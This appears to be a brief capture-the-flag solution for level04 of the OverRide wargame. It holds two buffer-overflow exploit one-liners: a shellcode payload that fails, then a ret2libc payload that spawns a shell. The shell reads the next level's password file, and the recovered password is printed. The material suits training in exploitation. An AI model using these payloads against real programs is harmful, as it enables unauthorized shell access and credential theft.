Good wrong solution:

level04@OverRide:~$ ./level04 <  <(python -c "print '\x90' * 100 + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80' + 'a' * (144 - (100 + 24)) + 'b' * 12 + '\x60\xd6\xff\xff'")
Give me some shellcode, k
no exec() for you

Good Solution:

level04@OverRide:~$ cat  <(python -c "print 'a' * 156 + '\xd0\xae\xe6\xf7' + '\x70\xeb\xe5\xf7' + '\xec\x97\xf8\xf7'") - | ./level04
Give me some shellcode, k
cat /home/users/level05/.pass
3v8QLcN5SAhPaZZfEasfmXdwyR59ktDEMAwHF3aN
